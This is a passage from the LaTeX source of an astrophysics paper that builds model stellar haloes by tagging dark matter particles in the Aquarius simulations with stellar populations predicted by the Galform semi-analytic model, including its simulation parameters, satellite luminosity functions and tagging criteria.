natural byproduct of hierarchical galaxy formation in the \lcdm{}
cosmology\footnote{In addition to forming components of the accreted
stellar halo, infalling satellites may cause dynamical heating of a
thin disc formed `in situ'
(e.g. Toth \& Ostriker 1992; Velazquez \& White 1999; Benson {et~al.} 2004; Kazantzidis {et~al.} 2008) and may
also contribute material to an accreted thick disc (Abadi, Navarro \& Steinmetz 2006)
or central bulge. We discuss these additional contributions to the
halo, some of which are not included in our modelling, in
\mnsec{sec:defining_haloes}}. The entire assembly history of a
galaxy may be encoded in the kinematics, metallicities, ages and
spatial distributions of its halo stars. Even though these stars
constitute a very small fraction of the total stellar mass, the
prospects are good for recovering such information from the haloes of
the Milky Way, M31 and even galaxies beyond the Local Group
(e.g. Johnston, Hernquist \& Bolte 1996; Helmi \& White 1999). In this context, theoretical
models can provide useful `blueprints' for interpreting the great
diversity of stellar haloes and their various sub-components, and for
relating these components to fundamental properties of galaxy
formation models. Alongside idealised models of tidal disruption,
\textit{ab initio} stellar halo simulations in realistic cosmological
settings are essential for \newt{direct} comparison with observational
data.
In principle, hydrodynamical simulations are well-suited to this task,
as they incorporate the dynamics of a baryonic component
self-consistently. However, many uncertainties remain in how physical
processes such as star formation and supernova feedback, which act
below the scale of individual particles or cells, are implemented in
these simulations. The computational cost of a single state-of-the-art
hydrodynamical simulation is extremely high. This cost severely limits
the number of simulations that can be performed, restricting the
freedom to explore different parameter choices or alternative
assumptions within a particular model. The computational demands of
hydrodynamical simulations are compounded in the case of stellar halo
models, in which the stars of interest constitute only $\sim1\%$ of
the total stellar mass of a Milky Way-like galaxy. Even resolving the
accreted dwarf satellites in which a significant proportion of these
halo stars may originate is close to the limit of current simulations
of disc galaxy formation. To date, few hydrodynamical simulations have
focused explicitly on the accreted stellar halo (recent examples
include Bekki \& Chiba 2001; Brook {et~al.} 2004; Abadi {et~al.} 2006 and
Zolotov {et~al.} 2009).
In the wider context of simulating the `universal' population of
galaxies in representative ($\gtrsim100\,\rm{Mpc^{3}}$) cosmological
volumes, these practical limitations of hydrodynamical simulations have
motivated the development of a powerful and highly successful
alternative, which combines two distinct modelling techniques:
well-understood high-resolution N-body simulations of large-scale
structure evolved self-consistently from \lcdm{} initial conditions and
fast, adaptable semi-analytic models of galaxy formation with very low
computational cost per run
(Kauffmann, Nusser \& Steinmetz 1997; Kauffmann {et~al.} 1999; Springel {et~al.} 2001; Hatton {et~al.} 2003; Kang {et~al.} 2005; Springel {et~al.} 2005; Bower {et~al.} 2006; Croton {et~al.} 2006; De~Lucia {et~al.} 2006). In
this paper we describe a technique motivated by this approach which
exploits computationally expensive, ultra-high-resolution N-body
simulations of \textit{individual} dark matter haloes by combining them
with semi-analytic models of galaxy formation. Since our aim is to study
the spatial and kinematic properties of stellar haloes formed through
the tidal disruption of satellite galaxies, our technique goes beyond
standard semi-analytic treatments.
The key feature of the method presented here is the dynamical
association of stellar populations (predicted by the semi-analytic
component of the model) with sets of \textit{individual particles} in
the N-body component. We will refer to this technique as `particle
tagging'. We show how it can be applied by combining the Aquarius suite
of six \newt{high resolution} isolated $\sim10^{12}\,\rm{M_{\sun}}$ dark
matter haloes (Springel {et~al.} 2008a,b) with the
\galform{} semi-analytic model (Cole {et~al.} 1994, 2000; Bower {et~al.} 2006). These simulations \newt{can resolve structures down to
$\sim10^{6}\rm{M_{\sun}}$, comparable to the least massive dark halo
hosts inferred for Milky Way satellites
(e.g. Strigari {et~al.} 2007; Walker {et~al.} 2009)}.
Previous implementations of \newt{the particle-tagging approach}
\movt{(White \& Springel 2000; Diemand, Madau \& Moore 2005; Moore {et~al.} 2006; Bullock \& Johnston 2005; De~Lucia \& Helmi 2008)} have so
far \newt{relied on cosmological simulations} severely limited by
resolution \newt{(Diemand {et~al.} 2005; De~Lucia \& Helmi 2008) or \newt{else} simplified
\newt{higher resolution} N-body models (Bullock \& Johnston 2005)}. \movt{In the
present paper, \newt{we apply this technique} as a postprocessing
operation to a `fully cosmological' simulation, in which structures have
grown \textit{ab initio}, interacting with one another
self-consistently. \newt{The resolution of our simulations is sufficient
to resolve stellar halo substructure in considerable detail.}}
With the aim of presenting our modelling approach and exploring some
of the principal features of our simulated stellar haloes, we proceed
as follows. In \mnsec{sec:method_overview} we review the Aquarius
simulations and their post-processing with the \galform{} model, and
in \mnsec{sec:buildinghaloes} we describe our method for recovering
the spatial distribution of stellar populations in the halo by tagging
particles. \newt{We calibrate our model by comparing the statistical
properties of the surviving satellite population to observations;
the focus of this paper is on the stellar halo, rather on than the
properties of these satellites.} In \mnsec{sec:results} we
describe our model stellar haloes and compare their structural
properties to observations of the Milky Way and M31. We also examine
the assembly history of the stellar haloes in detail
(\mnsec{sec:assembly}) and explore the relationship between the haloes
and the surviving satellite population. Finally, we summarise our
results in \mnsec{sec:conclusion}.
\section{Aquarius and Galform}
\label{sec:method_overview}
Our model has two key components: the Aquarius suite of six
high-resolution N-body simulations of Milky Way-like dark matter haloes,
and \galform{}, a semi-analytic model of galaxy formation. The technique
of post-processing an N-body simulation with a semi-analytic model is
well established
(Kauffmann {et~al.} 1999; Springel {et~al.} 2001; Helly {et~al.} 2003; Hatton {et~al.} 2003; Kang {et~al.} 2005; Bower {et~al.} 2006; De~Lucia {et~al.} 2006),
although its application to high-resolution simulations of individual
haloes such as Aquarius is novel and we review relevant aspects of the
\galform{} code in this context below.
\newt{Here, i}n the post-processing of the N-body simulation,
the stellar populations predicted by \galform{} to form in each halo
are \newt{also} associated with `tagged' subsets of dark matter
particles. By following these tagged dark matter particles, we track
the evolving \textit{spatial distribution and kinematics} of their associated
stars, in particular those that are stripped from satellites to build
the stellar halo. This level of detail regarding the distribution of
halo stars is unavailable to a standard semi-analytic approach, in
which the structure of each galaxy is represented by a combination of
analytic density profiles.
\newt{Tagging particles in this way
requires} the fundamental assumption that baryonic mass nowhere
dominates the potential and hence does not perturb the collisionless
dynamics of the dark matter. Generally, a massive thin disc is
expected to form at some point in the history of our \newt{`main'}
haloes. Although our semi-analytic model accounts for this thin disc
consistently, our dark matter tagging scheme cannot represent its
dynamics. For this reason, and also to avoid
confusion with our accreted halo stars, we do
not attempt to tag dark matter to represent stars forming in situ in a
thin disc at the centre of the main halo. \newt{T}he approximation \newt{that} the dynamics
of stars can be fairly represented by tagging dark matter
particles is justifiable for systems with high mass-to-light
ratios such as the dwarf satellites of the Milky Way and M31
\movt{(e.g. Simon \& Geha 2007; Walker {et~al.} 2009)}, the units from which
stellar haloes are assembled in our models.
\subsection{The Aquarius Haloes}
\label{sec:aquarius}
Aquarius (Springel {et~al.} 2008a) is a suite of high-resolution
simulations of six dark matter haloes having masses within the range
$1-2\times10^{12}\,\rm{M_{\sun}}$, comparable to values typically
inferred for the Milky Way halo
(e.g. Battaglia {et~al.} 2005; Smith {et~al.} 2007; Li \& White 2008; Xue {et~al.} 2008). By matching the
abundance of dark matter haloes in the Millennium simulation to the SDSS
stellar mass function, Guo {et~al.} (2009) find
$2.0\times10^{12}\,\rm{M_{\sun}}$ (with a 10-90\% range of
$0.8\times10^{12}\rm{M_{\sun}}$ to
$4.7\times10^{12}\rm{M_{\sun}}$). This value is sensitive to the
assumption that the Milky Way is a typical galaxy, and to the adopted
Milky Way stellar mass ($5.5\times10^{10}\,\rm{M_{\sun}}$;
Flynn {et~al.} 2006).
\newt{The Aquarius haloes were selected from a lower resolution version of the
Millennium-II simulation (Boylan-Kolchin {et~al.} 2009) and individually
resimulated using a multi-mass particle (`zoom') technique. In this
paper we use the `level 2' Aquarius simulations, the highest level
at which all six haloes were simulated.} We refer the reader to
Springel {et~al.} (2008a,b) for a comprehensive account
of the entire simulation suite and demonstrations of numerical
convergence. We list relevant properties of each halo/simulation in
\mntab{tbl:aquarius}. The simulations were carried out with the
parallel Tree-PM code \gadgetthree{}, an updated version of
\gadgettwo{} (Springel 2005). The Aq-2 simulations used a
fixed comoving Plummer-equivalent gravitational softening length of
$\epsilon = 48\:h^{{-}1} \:\rm{pc}$. \lcdm{} cosmological parameters
were adopted as $\Omega_{\rm{m}} = 0.25$, $\Omega_{\Lambda} = 0.75$,
$\sigma_{8} = 0.9$, $n_{\rm{s}} = 1$, and Hubble constant $H_{0} =
100h \,\rm{km\,s}^{{-}1}\rm{Mpc}^{-1}$. A value of $h = 0.73$ is
assumed throughout this paper. These parameters are identical to those
used in the Millennium Simulation and are marginally
consistent with WMAP 1- and 5-year constraints
(Spergel {et~al.} 2003; Komatsu {et~al.} 2009).
\begin{table}
\caption{Properties of the six Aquarius dark matter halo
simulations (Springel {et~al.} 2008a) on which the models in this
paper are based. The first column labels the simulation
(abbreviated from the as Aq-A-2, Aq-B-2 etc.). From left to
right, the remaining columns give the particle mass
$m_{\rm{p}}$, the number of particles within $r_{200}$, the
virial radius at $z=0$; the virial mass of the halo, $M_{200}$;
and the maximum circular velocity, $V_{max}$, and corresponding
radius, $r_{\rm{max}}$. Virial radii are defined as the radius
of a sphere with mean inner density equal to 200 times the
critical density for closure.}
\begin{tabular}{@{}lcccccc}
\hline
& $m_{\rm{p}}$ & $N_{200}$ & $M_{200}$ & $r_{200}$ & $V_{\rm{max}}$ & $r_{\rm{max}}$ \\
& $[10^{3}\rm{M_{\sun}}]$ & $[10^{6}]$ & $[10^{12}\rm{M_{\sun}}]$ & $[\rm{kpc}]$ & $[\rm{km}\,\rm{s}^{{-1}}]$ & $[\rm{kpc}]$ \\
\hline
A &$13.70$ & 135 & $1.84$& 246 & 209 & 28 \\
B &$6.447$ & 127 & $0.82$& 188 & 158 & 40 \\
C &$13.99$ & 127 & $1.77$& 243 & 222 & 33 \\
D &$13.97$ & 127 & $1.74$& 243 & 203 & 54 \\
E &$9.593$ & 124 & $1.19$& 212 & 179 & 56 \\
F &$6.776$ & 167 & $1.14$& 209 & 169 & 43 \\
\hline
\end{tabular}
\label{tbl:aquarius}
\end{table}
\subsection{The \galform{} Model}
\label{sec:galform}
N-body simulations of cosmic structure formation supply information on
the growth of dark matter haloes, which can serve as the starting
point for a semi-analytic treatment of baryon accretion, cooling and
star formation (see Baugh 2006, for a comprehensive discussion of the
fundamental principles of semi-analytic
modelling). The Durham semi-analytic model,
\galform{}, is used in this paper to postprocess the Aquarius N-body
simulations. \movt{The \galform{} code is controlled by a number of
interdependent parameters which are constrained in part by
theoretical limits and results from hydrodynamical
simulations. Remaining parameter values are chosen such that the
model satisfies statistical comparisons with several datasets, for
example the galaxy luminosity function measured in several wavebands
(e.g. Baugh {et~al.} 2005; Bower {et~al.} 2006; Font {et~al.} 2008). Such statistical constraints
on large scales do not guarantee that the same model will provide a
good description of the evolution of a single `Milky Way' halo and
its satellites. \movt{A model producing a satellite \newt{galaxy}
luminosity function consistent with observations is a fundamental
prerequisite for the work presented here, in which a proportion of
the total satellite population provides the raw material for the
assembly of stellar haloes.} \newt{W}e demonstrate below that the
key processes driving galaxy formation on small scales are captured
to good approximation by the existing \galform{} model and
parameter values of
Bower {et~al.} (2006).}
Many of the physical processes of greatest relevance to galaxy
formation on small scales were explored within the context of
semi-analytic modelling by Benson {et~al.} (2002b). Of particular
significance are the suppression of baryon accretion and cooling in
low mass haloes as the result of photoheating by a cosmic ionizing
background, and the effect of supernova feedback
in shallow potential wells. Together, these effects constitute a
straightforward astrophysical explanation for the disparity between
the number of low mass dark subhaloes found in N-body simulations of
Milky Way-mass hosts and the far smaller number of luminous satellites
observed around the Milky Way (the so-called `missing satellite'
problem). Recent discoveries of faint dwarf satellites and an improved
understanding of the completeness of the Milky Way sample (Koposov {et~al.} 2008; Tollerud {et~al.} 2008, and
refs. therein) have reduced the deficit of
\textit{observed} satellites, to the point of qualitative agreement
with the prediction of the model of
Benson {et~al.} (2002b). \newt{A}t issue now is the
quality (rather than the lack) of agreement between such models and
the data. \movt{\newt{W}e pay particular attention to the suppressive
effect of photoheating. This is a significant process for shaping
the faint end of the satellite luminosity function when, as we
assume here, the strength of supernova feedback is fixed by
constraints on the galaxy population as a whole.}
\subsubsection{Reionization and the satellite luminosity function}
A simple model of reionization heating based on a halo mass dependent
cooling threshold (Benson {et~al.} 2003) is implemented in the
Bower {et~al.} (2006) model of \galform{}. This threshold is set by
parameters termed $V_{\rm{cut}}$ and $z_{\rm{cut}}$. No gas is
allowed to cool within haloes having a circular velocity below
$V_{\rm{cut}}$ at redshifts below $z_{\rm{cut}}$. To good
approximation, this scheme reproduces the link between the suppression
of cooling and the evolution of the `filtering mass' (as defined
by Gnedin 2000) found in the more detailed model of
Benson {et~al.} (2002b), where photoheating of the intergalactic medium
was modelled explicitly. In practice, in this simple model, the value
of $V_{\rm{cut}}$ is most important. Variations in $z_{\rm{cut}}$
within plausible bounds have a less significant effect on the $z=0$
luminosity function.
As stated above, we adopt as a fiducial model the \galform{}
implementation and parameters of Bower {et~al.} (2006). However, we make a
single parameter change, lowering the value of $V_{\rm{cut}}$ from
$50\,\rm{km\,s^{-1}}$ to $30\,{\rm{km\,s^{-1}}}$. This choice is
motivated by recent \textit{ab initio} cosmological galaxy formation
simulations incorporating the effects of photoionization
self-consistently (Hoeft {et~al.} 2006; Okamoto, Gao \& Theuns 2008; Okamoto \& Frenk 2009; Okamoto {et~al.} 2009). These studies find that values of
$V_{\rm{cut}}\sim25-35\,\rm{km\,s^{-1}}$ are preferable to the higher
value suggested by the results of Gnedin (2000) and adopted in
previous semi-analytic models
(e.g. Somerville 2002; Bower {et~al.} 2006; Croton {et~al.} 2006; Li, De~Lucia \& Helmi 2009a). \newt{Altering
this value affects only the very faint end of the galaxy luminosity
function, and so does not change the results of (Bower {et~al.} 2006).}
\movt{The choice of a fiducial set of semi-analytic parameters in this
paper \newt{illustrates} the flexibility
\newt{of} our approach to modelling stellar
haloes. The N-body component of our models -- Aquarius -- represents
a considerable investment of computational time. In contrast, the
semi-analytic post-processing can be re-run in only a few hours, and
can be easily `upgraded' (by adding physical processes and
constraints) in order to provide more detailed output, explore the
consequences of parameter variations, or compare alternative
semi-analytic models.}
The \textit{V}-band satellite luminosity function resulting from the
application of the \galform{} model described above to each Aquarius
halo is shown in \fig{fig:galform_lf}. Satellites are defined as all
galaxies within a radius of 280 kpc from the centre of potential in
the principal halo, equivalent to the limiting distance of the
Koposov {et~al.} (2008) completeness-corrected observational sample. These
luminosity functions are measured from the \textit{particle}
realisations of satellites that we describe in the following section,
and not directly from the semi-analytic model. They therefore account
for the effects of tidal stripping, although these are minor: the
fraction of satellites brighter than $M_{\rm{V}}=-10$ is reduced very
slightly in some of the haloes. In agreement with the findings of
Benson {et~al.} (2002a), the model matches the faint end of the
luminosity function well, but fewer bright satellites are found in
each of our six models than are observed in the mean of the Milky Way
+ M31 system, although the number of objects concerned is small. The
true abundance of bright satellites for Milky Way-mass hosts is poorly
constrained at present, so it is unclear whether or not this
discrepancy reflects cosmic variance, a disparity in mass between the
Aquarius haloes and the Milky Way halo, or a shortcoming of our
fiducial Bower {et~al.} (2006) model. A modification of this model in which
the tidal stripping of hot gas coronae around infalling satellites is
explicitly calculated (rather than assuming instantaneous
removal; see Font {et~al.} 2008) produces an acceptable abundance of bright
satellites.
\begin{figure}
\includegraphics[width=84mm]{fig1.eps}
\caption{The cumulative \textit{V}-band luminosity functions (LFs) of
satellite galaxies for the six Aquarius haloes, adopting in
\galform{} the parameters of Bower {et~al.} (2006) with $V_{\rm{cut}} =
30\:\rm{km\,s^{-1}}$. These LFs \textit{include} the effects of
tidal stripping measured from our assignment of stars to dark matter
particles (\mnsec{sec:buildinghaloes}), although this makes only a
small difference to the LF from our semi-analytic model alone. All
galaxies within 280~kpc of the halo centre are counted as satellites
(the total number of contributing satellites in each halo is
indicated in the legend). The stepped line (grey, with error bars)
shows the observed mean luminosity function found by
Koposov {et~al.} (2008) for the MW and M31 satellite system (also to
280~kpc), assuming an NFW distribution for satellites in correcting
for SDSS sky coverage and detection efficiency below
$M_{\mathrm{v}}=-10$. The colour-coding of our haloes in this figure
is used throughout.}
\label{fig:galform_lf}
\end{figure}
\subsubsection{Further details}
Within \galform{}, cold gas is transferred from tidally destroyed
satellites to the disc of the central galaxy when their host subhaloes
are no longer identified at the resolution limit imposed by
\subfind{}. In the Aq-2 simulations this corresponds to a minimum
resolved dark halo mass of $\sim3\times10^{5}\rm{M}_{\sun}$. In the
\galform{} model of Bower {et~al.} (2006), which does not include tidal
stripping or a `stellar halo' component, the satellite galaxy is
considered to be fully disrupted (merged) at this point: its stars
are transferred to the bulge component of the central galaxy. By
contrast, our particle representation (described in
\mnsec{sec:buildinghaloes}) allows us to follow the \textit{actual}
fate of the satellite stars independently of this choice in the
semi-analytic model. This choice is therefore largely a matter of
`book-keeping'; we have ensured that adopting this approach does not
prematurely merge galaxies in the semi-analytic model that are still
capable of seeding new stellar populations into the particle
representation. Semi-analytic models based on N-body simulations
often choose to `follow' satellites with dark haloes falling below
the numerical resolution by calculating an appropriate merger
time-scale from the last-known N-body orbital parameters, accounting
for dynamical friction. However, the resolution of Aquarius is
sufficiently high to make a simpler and more self-consistent
approach preferable in this case, preserving the one-to-one
correspondence between star-forming semi-analytic galaxies and bound
objects in the simulation. We have checked that allowing
semi-analytic galaxies to survive without resolved subhaloes,
subject to the treatment of dynamical friction used by
Bower {et~al.} (2006), affects only the faintest ($M_{\mathrm{v}} \sim 0$)
part of the survivor luminosity function. The true nature and
survival of these extremely faint sub-resolution galaxies remains an
interesting issue to be addressed by future semi-analytic models of
galactic satellites.
In \mntab{tbl:summary} (\mnsec{sec:results}) we list the \textit{V}-band
magnitudes and total stellar masses of the central galaxies that form in
the six Aquarius haloes. A wide range is evident, from an M31-analogue
in halo Aq-C, to an M33-analogue in Aq-E. This is not unexpected: the
Aquarius dark haloes were selected only on their mass and isolation, and
these criteria alone do not guarantee that they will host close
analogues of the Milky Way. The scaling and scatter in the predicted
relationship between halo mass and central galaxy stellar mass are
model-dependent. With the \galform{} parameter values of
Bower {et~al.}, the mean central stellar mass in a typical
Aquarius halo ($M_{\rm{halo}}\sim1.4\times10^{12}\mathrm{M_{\sun}}$) is
$\sim1.5\times10^{10}\,\mathrm{M_{\sun}}$, approximately a factor of
3--4 below typical estimates of the stellar mass of the Milky Way
($\sim6\times10^{10}\,\mathrm{M_{\sun}}$ Flynn {et~al.} 2006); the
scatter in $M_{\rm{gal}}$ for our central galaxies reflects the overall
distribution produced by the model of Bower {et~al.} (2006) for haloes of this
mass. The model of De~Lucia {et~al.} (2006), which like the Bower {et~al.} (2006)
model was constrained using statistical properties of bright field and
cluster populations, produces a mean central stellar mass of
$\sim4\times10^{10}\,\mathrm{M_{\sun}}$ for the typical halo mass of the
Aquarius simulations, as well as a smaller scatter about the mean value.
In light of these modelling uncertainties and observational
uncertainties in the determination of the true Milky Way dark halo
mass to this precision, we choose not to scale the Aquarius haloes to
a specific mass for `direct' comparison with the Milky Way. The
results we present concerning the assembly and structure of stellar
haloes and the ensemble properties of satellite systems should not be
sensitive to whether or not their galaxies are predicted to be direct
analogues of the Milky Way by the Bower {et~al.} (2006) \galform{}
model. Therefore, in interpreting the \textit{absolute}
\newt{values} of quantities compared to observational
data in the following sections, it should be borne in mind that we
model a \textit{range} of halo masses that could lie somewhat below
the likely Milky Way value.
The Bower {et~al.} (2006) implementation of \galform{} results in a
mass-metallicity relation for faint galaxies which is slightly steeper
than that derived from the satellites of the Milky Way and M31
(e.g. Mateo 1998; Kirby {et~al.} 2008; see also Tremonti {et~al.} 2004 and
refs. therein). This results in model galaxies being on average
$\sim0.5\,\rm{dex}$ more metal-poor in \feh{} than the observed
relation at magnitudes fainter than $M_{\rm{V}}\sim-10$. Whilst it
would be straightforward to make \textit{ad hoc} adjustments to the
model parameters in order to match this relation, doing so would
violate the agreement established between the Bower {et~al.} (2006)
parameter set and a wide range of statistical constraints from the
bright ($M_V<-19$) galaxy population.
\section{Building Stellar Haloes}
\label{sec:buildinghaloes}
\subsection{Assigning Stars To Dark Matter}
\label{sec:starstodm}
Observations of the stellar velocity distributions of dwarf spheroidal
satellites of the Milky Way imply that these objects are
dispersion-supported systems with extremely high mass-to-light ratios,
of order 10--1000
(e.g. Mateo 1998; Simon \& Geha 2007; Strigari {et~al.} 2007; Wolf {et~al.} 2009; Walker {et~al.} 2009). As
we describe in this section, in order to construct basic models of
these high-M/L systems without simulating their baryon dynamics
explicitly, we will assume that their stars are formed `dynamically
coupled' to a strongly bound fraction of their dominant dark matter
component, and will continue to trace that component throughout the
simulation. Here we further assume that the depth at which stars form
in a halo potential well depends only on the total mass of the
halo. While these assumptions are too simplistic a description of
stellar dynamics in such systems to compare with detailed structural
and kinematic observations, we show that they none the less result in
half-light radii and line-of-sight velocity dispersions in agreement
with those of Milky Way dwarf spheroidals. Hence the disruption of a
fraction of these model satellites by tidal forces in the main halo
should reproduce stellar halo components (`streams') at a level of
detail sufficient for an investigation of the assembly and gross
structure of stellar haloes. \reft{We stress that these comparisons
are used as constraints on the single additional free parameter in
our model, and are not intended as predictions of a model
for the satellite population.}
In the context of our \galform{} model, the stellar content of a
single galaxy can be thought of as a superposition of many distinct
stellar populations, each defined by a particular formation time and
metallicity. Although the halo merger tree used as input to \galform{}
is discretized by the finite number of simulation outputs (snapshots),
much finer interpolating timesteps are taken between snapshots when
solving the differential equations governing star
formation. Consequently, a large number of distinct populations are
`resolved' by \galform{}. However, we can update our particle
(dynamical) data (and hence, can assign stars to dark matter) only at
output times of the pre-existing N-body simulation. For the purposes
of performing star-to-dark-matter assignments we reduce the
fine-grained information computed by \galform{} between one output
time and the next to a single aggregated population of `new stars'
formed at each snapshot.
As discussed above and in \mnsec{sec:introduction}, we adopt the
fundamental assumption that the motions of stars can be represented by
dark matter particles. The aim of our method here is to select a
sample of representative particles from the parent N-body simulation
to trace \textit{each such stellar population}, individually. We
describe first the general objective of our selection process, and
then examine the selection criteria that we apply in practice.
Consider first the case of a single galaxy evolving in isolation. At a
given simulation snapshot (B) the total mass of new stars formed since
the previous snapshot (A) is given by the difference in the stellar
mass of the semi-analytic galaxy recorded at each time,
\begin{equation}
{\Delta}M_{\star}^{AB} = M_{\star}^{B} -M_{\star}^{A}.
\end{equation}
In our terminology, $\Delta M_{\star}^{AB}$ is a single stellar
population (we do not track the small amount of mass lost during
subsequent stellar evolution). The total mass in metals within the
population is determined in the same way as the stellar mass; we do
not follow individual chemical elements. In a similar manner, the
luminosity of the new population (at $z=0$) is given by the difference
of the total luminosities (after evolution to $z=0$) at successive
snapshots.
From the list of particles in the simulation identified with the dark
matter halo of the galaxy at B, we select a subset to be tracers of
the stellar population ${\Delta}M_{\star}^{AB}$. Particles in this
tracer set are `tagged', i.e. are identified with data describing the
stellar population. In the scheme we adopt here, equal `weight'
(fraction of stellar mass, luminosity and metals in $\Delta
M_{\star}^{AB}$) is given to each particle in the set of tracers. We
repeat this process for all snapshots, applying the energy criterion
described below to \textit{select a new set of DM tracers each time
new stars are formed} in a particular galaxy. In this scheme, the
same DM particle can be selected as a tracer at more than one output
time (i.e. the same DM particle can be tagged with more than one
stellar population). Hence a given DM particle accumulates its own
individual star formation history. The dynamical evolution of
satellite haloes determines whether or not a particular particle is
eligible for the assignment of new stars during any given episode of
star formation.
So far we have considered an `isolated' galaxy. In practice, we apply
this technique to a merger tree, in which a galaxy grows by the
accretion of satellites as well as by \textit{in situ} star
formation. In the expression above, the total stellar mass at A,
$M_{\star}^{A}$, is simply modified to include a sum over $N$
immediate progenitor galaxies in addition to the galaxy itself i.e.,
\begin{equation}
{\Delta}M_{\star}^{AB} = M_{\star}^{B} - M_{\star,0}^{A} - \sum_{i>0}
{M_{\star,i}^{A}}
\end{equation}
where $M_{\star,0}^{A}$ represents the galaxy itself and
$M_{\star,i}^{A}$ is the total stellar mass (at A) of the $i$'th
progenitor deemed to have merged with the galaxy in the interval
AB. Stars forming in the progenitors during the interval AB and stars
forming in the galaxy itself are treated as a single population.
There is a one-to-one correspondence between a galaxy and a dark
matter structure (halo or subhalo) from which particles are chosen as
tracers of its newly formed stars. As discussed in
\mnsec{sec:galform}, a satellite galaxy whose host subhalo is no
longer identified by \subfind{} has its cold gas content transferred
immediately to the central galaxy of their common parent halo and
forms no new stars. In the semi-analytic model, the stars of the
satellite are also added to the bulge component of the central
galaxy. This choice is irrelevant in our particle representation, as
we can track the actual fate of these stars.
\begin{figure*}
\centering
\includegraphics[clip=False]{fig2.eps}
\caption{Examples of individual satellites in our models (solid black
lines), compared to Fornax (red) and Carina (blue), showing surface
brightness (left, Irwin \& Hatzidimitriou 1995) and line-of-sight velocity
dispersion (right, Walker {et~al.} 2009). With our fiducial
\galform{} model, simultaneous matches to both $\sigma(R)$ and
$\mu(R)$ for these datasets are found only among satellites that
have undergone substantial tidal stripping (see text).}
\label{fig:examplesatA11z0}
\end{figure*}
\subsection{Assignment criteria}
\label{sec:assignmentcriteria}
\subsubsection{Selection of dark matter particles}
\label{sec:method}
In this section we describe how we choose the dark matter particles
within haloes that are to be tagged with a newly formed stellar
population. In \mnsec{sec:introduction} we briefly described the
particle-tagging method employed by Bullock \& Johnston (2005), the philosophy
of which we term \textit{`in vitro'}, using idealised initial
conditions to simulate accretion events individually in a `controlled'
environment. By contrast, our approach is to \textit{postprocess}
fully cosmological simulations \textit{`in vivo'}\footnote{This
terminology should not be taken to imply that `star particles'
themselves are included in the N-body simulation; here stellar
populations are simply tags affixed to dark matter particles.}. In a
fully cosmological N-body simulation the growth of the central
potential, the structure of the halo and the orbits, accretion times
and tidal disruption of subhaloes are fully consistent with one
another. The central potential is non-spherical (although no disc
component is included in our dynamical model) and can grow violently
as well as through smooth accretion. Our model is therefore applicable
at high redshift when the halo is undergoing rapid assembly. The
complexities in the halo potential realised in a fully cosmological
simulation are likely to be an important influence on the dynamics of
satellites (e.g. Sales {et~al.} 2007a) and on the evolution of
streams, through phase-mixing and orbital precession
(e.g. Helmi \& White 1999).
\newt{W}e approach the selection of dark matter particles for stellar
tagging differently to Bullock \& Johnston (2005)\newt{, because}\movt{ we are
postprocessing a cosmological N-body simulation rather than constructing
idealised initial conditions for each satellite}. \newt{R}ather than
assigning the mass-to-light ratio of each tagged particle by comparing
stellar and dark matter energy distribution functions in the halo
concerned, we assume that the energy distribution of newly formed stars
traces that of the dark matter. We order the particles in the
halo by binding energy\footnote{Here, the most bound particle is that
with the most negative total energy, including both kinetic and
gravitational contributions. Binding energies are computed relative to
the bound set of particles comprising an object identified by
\subfind{}.} and select a most-bound fraction $f_{\rm{MB}}$ to be
tagged with newly-formed stars. As previously described, stars are
shared equally among the selected DM particles.
\newt{Our approach implies a rather simple dynamical model for stars
in satellite galaxies. However, the main results of this paper do
not concern the satellites themselves; instead we focus on the
debris of objects that are totally (or largely) disrupted to build
the stellar halo. As we describe below, we compare the structure and
kinematics of our model satellites (those that survive at $z=0$) to
Local Group dwarf galaxies in order to fix the value of the free
parameter, $f_{\rm{MB}}$. Since we impose this constraint, our
method cannot predict these satellite properties \textit{ab
initio}. Constraining our model in this way ensures reasonable
structural properties in the population of progenitor satellites,
and retains full predictive power with regard to the stellar
halo. More complex models would, of course, be possible, in which
$f_{\rm{MB}}$ is not a free parameter but is instead physically
determined by the semi-analytic model. It would also be possible to
use a more complicated tagging scheme to attempt to represent, for
example, star formation in a disc. However, }
\movt{\newt{such models would add substantial complexity to
the method and there are currently very few observational
constraints on how stars were formed in satellite galaxies. Thus,
we believe that a} simple model suffices for our present
study of the stellar halo\newt{.}}
Our approach has similarities with that of De~Lucia \& Helmi (2008), who tag
the most bound 10\% of particles in satellite haloes with
stars. However, De~Lucia \& Helmi perform this tagging only
\textit{once} for each satellite, at the time at which its parent halo
becomes a subhalo of the main halo (which we refer to as the time of
infall\footnote{In both Bullock \& Johnston (2005) and De~Lucia \& Helmi (2008) only
satellites directly accreted by the main halo `trigger' assignments
to dark matter; the hierarchy of mergers/accretions forming a
directly-infalling satellite are subsumed in that single
assignment.}). Both this approach and that of Bullock \& Johnston (2005)
define the end result of the previous dynamical evolution of an
infalling satellite, the former by assuming light traces dark matter
and the latter with a parameterized King profile.
As described above, in our model each newly-formed stellar population
is assigned to a subset of DM particles, chosen according to the
`instantaneous' dynamical state of its host halo. This choice is
independent of any previous star formation in the same halo. It is the
dynamical evolution of these many tracer sets in each satellite that
determines its stellar distribution at any point in the simulation.
Implementing a particle-tagging scheme such as this within a fully
cosmological simulation requires a number of additional issues to be
addressed, which we summarise here.
\renewcommand{\labelenumii}{\roman{enumi}}
\begin{enumerate}
\item \textit{Subhalo assignments}: Star formation in a satellite
galaxy will continue to tag particles regardless of the level of
its halo in the hierarchy of bound structures (halo, subhalo,
subsubhalo etc.). The growth of a dark matter halo ends when it
becomes a subhalo of a more massive object, whereupon its mass is
reduced through tidal stripping. The assignment of stars to
particles in the central regions according to binding energy
should, of course, be insensitive to the stripping of dark matter
at larger radii. However, choosing a fixed fraction of dark
matter tracer particles to represent new stellar populations
couples the mass of the subhalo to the number of particles
chosen. Therefore, when assigning stars to particles in a subhalo,
we instead select a fixed \textit{number} of particles, equal to
the number constituting the most-bound fraction $f_{\rm{MB}}$ of
the halo at the time of infall.
\item \textit{Equilibrium criterion}: To guard against assigning stars
to sets of tracer particles that are temporarily far from dynamical
equilibrium, we adopt the conservative measure of deferring
assignments to any halo in which the centres of mass and potential
are separated by more than 7\% of the half-mass radius $r_{1/2}$. We
select $0.07\,r_{1/2}$ in accordance with the criterion of
$0.14\,r_{\rm{vir}}$ used to select relaxed objects in the study of
Neto {et~al.} (2007), taking $r_{\rm{vir}}\sim2\,r_{1/2}$. These deferred
assignments are carried out at the next snapshot at which this
criterion is satisfied, or at the time of infall into a more massive
halo.
\item \textit{No in situ star formation}: Stars formed in the
main galaxy in each Aquarius simulation (identified as the central
galaxy of the most massive dark halo at $z=0$) are never assigned to
DM particles. This exclusion is applied over the entire history of
